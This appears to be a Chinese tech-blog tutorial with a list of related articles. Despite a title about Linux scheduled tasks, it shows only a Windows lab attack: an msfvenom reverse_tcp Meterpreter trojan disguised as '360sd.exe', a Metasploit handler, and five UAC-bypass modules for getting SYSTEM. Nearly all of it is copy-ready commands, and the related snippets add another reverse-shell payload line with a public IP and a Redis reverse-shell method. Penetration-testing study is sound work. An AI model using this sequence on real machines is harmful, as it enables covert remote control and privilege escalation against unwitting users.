Linux计划任务执行msf木马,Metasploit生成木马文件获取shell和UAC提权操作

最新推荐文章于 2025-03-09 16:09:25 发布
最新推荐文章于 2025-03-09 16:09:25 发布
阅读量1k 收藏 3
点赞数
文章标签: Linux计划任务执行msf木马

前言

攻击环境

获取shell

UAC提权

一. 前言

前段时间有做过一次内核提权的尝试,不过没有成功,主要还是权限控制的比较严格,并且该打的补丁都打了。但是方法还是有用的,还有就是思路流程总结一下。

二. 攻击环境攻击机:kali Linux 2019.1 IP:192.168.28.156

靶机:Windows7 ultimate sp1 IP:192.168.28.138

三. 获取shell

3.1 生成木马

首先启动msf数据库

1

2/etc/init.d/postgresql start

msfdb init

生成木马

1

2

3

4

5

6msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.28.156 lport=8585 -f exe -o 360sd.exe

-p 选用什么payload

lhost 监听ip

lport 监听端口

-f 生成文件的类型

3.2 启用MSF监听1

2

3

4

5

6use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options//查看那些参数是需要输入的

set lhost 192.168.28.156 //设置监听的IP

set lport 8585 //设置监听的端口

run/exploit

3.3 投放木马并运行

3.4 获取shell

%5Cimage%5Cmeterpreter-UACgetSystem%5C1.jpg

四. UAC提权

在获取到shell之后,可以先测试一下命令测试权限

1

2getsystem

getuid

如果你没有系统/管理员权限,那么你就需要绕过目标系统的UAC保护。

输入background将获取到的会话转入后台,更换其他exp进行提权操作。

4.1 Windows升级UAC保护绕过

此模块将通过进程注入利用受信任的发布者证书绕过Windows UAC。这将产生第二个shell,而且UAC保护已经关闭。

1

2

3msf > use exploit/windows/local/bypassuac

msf exploit windows/local/bypassuac) > set session 1

msf exploit(windows/local/bypassuac) > exploit

从下图可以看到,又建立了一个meterpreter会话2连接,现在输入getsystem和getuid两条命令来查看系统权限:

%5Cimage%5Cmeterpreter-UACgetSystem%5C2.webp

4.2 Windows升级UAC保护绕过(内存注入)

此模块将通过进程注入利用受信任的发布者证书绕过Windows UAC。这将产生第二个shell,而且UAC保护已经关闭。此模块使用反射DLL注入技术仅删除DLLpayload二进制文件而不是删除标准技术中的三个单独的二进制文件。但是,它需要选择正确的体系结构(对于SYSWOW64系统也使用x64)。如果指定EXE :: Custom,你的DLL应该在单独的进程中启动payload后调用ExitProcess()。

1

2

3msf > use exploit/windows/local/bypassuac_injection

msf exploit(windows/local/bypassuac_injection) > set session 1

msf exploit(windows/local/bypassuac_injection) > exploit

从下图中可以看出,meterpreter 会话2已经成功打开,现在输入getsystem和getuid两条命令来查看权限

%5Cimage%5Cmeterpreter-UACgetSystem%5C3.webp

4.3 Windows升级UAC保护绕过(FodHelper注册表键值绕过)

此模块将通过在当前用户配置单元下劫持注册表中的特殊键并插入将在启动Windows fodhelper.exe应用程序时调用的自定义命令来绕过Windows 10 UAC。这将产生第二个shell,而且UAC保护已经关闭。此模块修改注册表项,但在调用payload后清除该项。该模块不要求payload的结构与OS匹配。如果指定EXE :: Custom,你的DLL应该在单独的进程中启动payload后调用ExitProcess()。

1

2

3msf > use exploit/windows/local/bypassuac_fodhelper

msf exploit(windows/local/bypassuac_fodhelper) > set session 1

msf exploit(windows/local/bypassuac_fodhelper) > exploit

%5Cimage%5Cmeterpreter-UACgetSystem%5C4.webp

4.4 Windows升级UAC保护绕过(Eventvwr注册表键值绕过)

此模块将通过在当前用户配置单元下劫持注册表中的特殊键并插入自定义命令,这个命令将在启动Windows fodhelper.exe应用程序时调用来绕过Windows 10 UAC。这将产生第二个shell,而且UAC保护已经关闭。此模块修改注册表项,但在调用payload后清除该项。该模块不要求payload的结构与OS匹配。如果指定EXE :: Custom,你的DLL应该在单独的进程中启动payload后调用ExitProcess()。

1

2

3msf > use exploit/windows/local/bypassuac_eventvwr

msf exploit(windows/local/bypassuac_eventvwr) > set session 1

msf exploit(windows/local/bypassuac_eventvwr) > exploit

%5Cimage%5Cmeterpreter-UACgetSystem%5C5.webp

4.5 Windows升级UAC保护绕过(COM Handler劫持绕过)

此模块将通过在HKCU配置单元中创建COM处理程序注册表项来绕过Windows UAC。加载某些高完整性进程时,会引用这些注册表项,从而导致进程加载用户控制的DLL。这些DLL包含导致会话升级的payload。在payload调用后清除注册表项修改。此模块要求payload的体系结构与OS匹配,但当前的低权限Meterpreter会话的体系结构并不相同。如果指定EXE :: Custom,你的DLL应该在单独的进程中启动payload后调用ExitProcess()。此模块通过目标上的cmd.exe调用目标二进制文件。因此,如果限制cmd.exe访问,则此模块将无法正常运行。

1

2

3msf > use exploit/windows/local/bypassuac_comhijack

msf exploit(windows/local/bypassuac_comhijack) > set session 1

msf exploit(windows/local/bypassuac_comhijack) > exploit

%5Cimage%5Cmeterpreter-UACgetSystem%5C6.webp

内网渗透(MSF计划任务)
qq_42383069的博客
12-26 1229
内网渗透(MSF计划任务)
linux php木马,linux本地内核漏洞介绍
weixin_28917223的博客
03-11 258
2019年07月20日,Linux正式修复了一个本地内核漏洞。通过此漏洞,攻击者可将普通限用户升为Root限。漏洞描述当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数。但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用。PTRACE_TRACEME获取父进程的凭证,使其...
木马免杀之MSFVenom制作木马
最新发布
没有网络安全就没有国家安全
03-09 1955
木马免杀之MSFVenom制作木马
[轻松学会shell编程]-5、计划任务
m0_48638643的博客
06-23 614
创建管理在指定时间自动执行的任务注意事项:要使任务计划在指定时间自动运行,计划任务的服务必须使启动的。crond进行是一直在运行的 1.2、守护进程(Daemon) 定义:一直在内存里运行的进程,直到我们人为的停止它的运行,不然它是一直在内存中运行的。因为一直在内存里运行,所以我们的用户可以随时去访问。我们若是用"ps aux"命令来查看,会看到很多带末尾带"d"的进程,那么这些进程就是守护进程。上面的守护状态,是一直在"运行"、"阻塞"、"就绪"这三种状态中循环往复的。定义:在指定的日期、时间点自
——Linux
weixin_58666006的博客
09-13 1866
拿下getshell后不是管理员账户则需要
[病毒木马] 利用 Windows 任务计划程序
LYSM
03-18 903
背景 Windows 内置了 任务计划程序 功能,在计算机管理中可以看到。 这个东西可以让你的程序在特定的条件下启动,很多病毒木马使用它在做自启动。 手动创建一个计划任务 参考:https://blog.youkuaiyun.com/weixin_43279032/article/details/90030747 使用 cmd 创建一个计划任务 参考:https://blog.youkuaiyun.com/weixin_30371875/article/details/97575358 ...
MSF生成后门木马
一醉一休的博客
11-19 3474
为了方便平时使用,记录一下操作命令
Metasploit 生成木马
2201_75516783的博客
11-28 901
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploitmsfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
msf反弹php shell,msf实现linux shell反弹
weixin_42488997的博客
03-22 845
运行环境:kali ip:192.168.123.90Linux ip:192.168.123.5Linux服务器上开有80端口,并且有上传话不多说,上传一句话,菜刀连接。然后打开kali 并启动msf进入> use exploit/multi/handler设置 payload> set payload php/metrpreter/reverse_tcp...
通过计划任务实现持续性攻击
Ms08067安全实验室
11-06 715
Windows操作系统中供了一个实用工具schtasks.exe,系统管理可以使用该工具完成在指定日期时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性...
0x09.第九课 Metasploit生成linux木马并尝试.pdf
06-24
0x09.第九课 Metasploit生成linux木马并尝试.pdf
Linux下WEBSHELL一技
06-15
Linux下WEBSHELL一技 用phpshell2.0配合ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
linux php木马,Centos7 下 redis 入侵实战 - root
weixin_29471541的博客
03-23 396
.知识铺垫Redis 还有几个奇怪的功能:Linux一个功能可以通过一个端口写到本地文件,如果我要写一个文件,而这个文件木马,那就自动拉起了。如果写入自己签名的公钥,用自己的私钥解公钥,自己解自己的,所以直接替换公钥,就是通过 Redis。那么下面来实战演练一下通过redis匿名登陆写入反弹shell .环境准备首先启动一个允许匿名登陆的redis服务器。1[root@server01...
winodws计划任务
cxk
06-27 291
限维持-windows计划任务 目录 0x00 靶机 0x01 实战 0x02 问题 0X00 靶机 windows 2K3 IP 192.168.5.187 账户密码 administrator 123456 0x01实战 A 1)本机win+r打开远程桌面连接,输入靶机地址192.168.5.187,并输入账户密码登录 2)点击右下角的开始-控制面板-任务计划 3)任务计划向导,下一步...
【内网—升】——linux本地_脏牛漏洞
weixin_45588247的博客
08-23 4673
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞说明:1. 原理:2. 漏洞成因:五、环境准备:1. 安装Apache及php环境:2. 安装gcc编译器(C语言编译器):2. 关闭防火墙:3. 营造webshell环境:六、过程:1. 进行信息收集:收集当前用户限及操作系统版本信息:使用kali通过linux版本查看可以利用exp:使用`漏洞利用数据库`搜索与内核相关的漏洞exp:使用`辅助脚本`扫描可以利用的漏洞:2. 进行: 一、实验目的: 通过搭建漏洞环境,学习linu
操作系统升(十三)之绕过UAC-MSFCS绕过UAC
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-25 1603
该模块会创建一个执行文件,目标机器会运行一个发起限请求的程序,示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system限的shell。这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可。使用该模块的使用,当前用户必须是管理员组中的用户,UAC为默认设置。拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC执行添加用户的命令时显示拒绝访问。使用CS自带的插件进行绕过后可以完成添加用户的命令。生成一个MSFSHELL
Metasploit 生成反弹连接木马
qq_26002283的博客
04-01 1439
“注 本文为笔者学习过程中记录” Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe 生成一个名为 test.exe 的木马文件msf目录下 Step2: 通过 msfconsole 命令进入metasploit : Step3...
如何有效防止PHP木马linux操作系统
小迷童
05-09 1675
1.防止跳出web目录 首先修改httpd.conf: 如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如 你的web目录是/usr /local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache/h
Windows升—溢出
剁椒鱼头没剁椒的博客
03-16 3275
这里需要我们了解的升大概分为:后台限,网站限,数据本限。接口限,系统限。域控限等。此方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以升的exp。不过这里需要注意,只要对应的补丁号加上对应的系统的版本的exp才可以成功,有时候如果查找到exp不成功,那么就可以查看是不是系统版本没对应上,且不排除一些漏洞利用需要相应的环境。
kali msf 木马
07-26
Kali Linux Metasploit Framework (Msf) 是一款广泛用于网络安全渗透测试、漏洞评估黑客工具的开源平台。Metasploit 的核心组件是一个强大的远程代码执行框架,其中包含了大量现成的exploits(漏洞利用模块)payloads(木马)。当安全专家发现系统存在已知漏洞时,可以使用Metasploit木马payload来创建一个恶意软件样本,这个payload能够悄悄地在网络中运行,通常会获取对目标系统的控制限。 举个例子,Msf中的"msfpayload"命令可以生成各种类型的木马,如Windows的 Meterpreter payload,它可以在入侵成功后一个交互式的shell,让攻击者能远程操控受害者机器执行各种操作。这种木马常用于教学、红队演练安全培训中,帮助学习者理解攻击过程防御策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值